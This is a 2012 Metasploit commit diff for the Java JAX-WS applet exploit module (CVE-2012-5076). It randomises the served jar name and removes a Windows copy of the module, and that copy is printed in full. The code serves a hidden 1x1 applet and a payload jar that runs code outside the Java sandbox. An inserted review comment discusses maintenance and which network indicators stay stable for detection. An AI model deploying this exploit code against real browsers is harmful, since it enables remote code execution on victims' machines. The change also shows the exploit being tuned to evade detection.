
thins in place...

commit 8e7a74880595e1af878dd6778103f0aad87dcaee 1 parent 5076198
authored November 11, 2012
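--- a/modules/exploits/multi/browser/java_jre17_jaxws.rb
+++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb
@@ -108,9 +108,10 @@ def on_request_uri( cli, request )
 	end
 
 	def generate_html
+		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
 		html  = "<html><head></head>"
 		html += "<body>"
-		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+		html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
 		html += "</applet></body></html>"
 		return html
 	end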
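Review bot: The added `jar_name` line in generate_html carries no comment explaining why an arbitrary archive name still resolves. It appears to rely on on_request_uri (body outside this hunk) serving the jar for any URI ending in `.jar`, as the removed windows copy does with `request.uri.match(/\.jar$/i)`. I would add `# name is arbitrary (3-8 letters): on_request_uri answers any *.jar request` above it, so a later change to that regex does not silently break the page. For anyone maintaining detections for this module's traffic, the archive file name stops being a stable indicator after this change, while the fixed `code="Exploit.class"` attribute and the 1x1 applet tag on the same line are unchanged.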
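--- a/modules/exploits/windows/browser/java_jre17_jaxws.rb
+++ b/modules/exploits/windows/browser/java_jre17_jaxws.rb
@@ -1,119 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-require 'rex'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	include Msf::Exploit::Remote::BrowserAutopwn
-	autopwn_info({ :javascript => false })
-
-	def initialize( info = {} )
-		super( update_info( info,
-			'Name'          => 'Java Applet JAX-WS Remote Code Execution',
-			'Description'   => %q{
-					This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
-				code outside of the sandbox as exploited in the wild in November of 2012. The
-				vulnerability affects Java version 7u7 and earlier.
-			},
-			'License'       => MSF_LICENSE,
-			'Author'        =>
-				[
-					'Unknown', # Vulnerability Discovery
-					'juan vazquez' # metasploit module
-				],
-			'References'    =>
-				[
-					[ 'CVE', '2012-5076' ],
-					[ 'OSVDB', '86363' ],
-					[ 'BID', '56054' ],
-					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
-					[ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ]
-				],
-			'Platform'      => [ 'java', 'win' ],
-			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
-			'Targets'       =>
-				[
-					[ 'Generic (Java Payload)',
-						{
-							'Arch' => ARCH_JAVA,
-						}
-					],
-					[ 'Windows Universal',
-						{
-							'Arch' => ARCH_X86,
-							'Platform' => 'win'
-						}
-					],
-					[ 'Linux x86',
-						{
-							'Arch' => ARCH_X86,
-							'Platform' => 'linux'
-						}
-					]
-				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Oct 16 2012'
-			))
-	end
-
-
-	def on_request_uri( cli, request )
-		if not request.uri.match(/\.jar$/i)
-			if not request.uri.match(/\/$/)
-				send_redirect(cli, get_resource() + '/', '')
-				return
-			end
-
-			print_status("#{self.name} handling request")
-
-			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
-			return
-		end
-
-		paths = [
-			[ "Exploit.class" ],
-			[ "MyPayload.class" ]
-		]
-
-		p = regenerate_payload(cli)
-
-		jar  = p.encoded_jar
-
-		paths.each do |path|
-			1.upto(path.length - 1) do |idx|
-				full = path[0,idx].join("/") + "/"
-				if !(jar.entries.map{|e|e.name}.include?(full))
-					jar.add_file(full, '')
-				end
-			end
-			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2012-5076", path ), "rb")
-			data = fd.read(fd.stat.size)
-			jar.add_file(path.join("/"), data)
-			fd.close
-		end
-
-		print_status("Sending Applet.jar")
-		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
-
-		handler( cli )
-	end
-
-	def generate_html
-		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
-		html  = "<html><head></head>"
-		html += "<body>"
-		html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
-		html += "</applet></body></html>"
-		return html
-	end
-
-end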
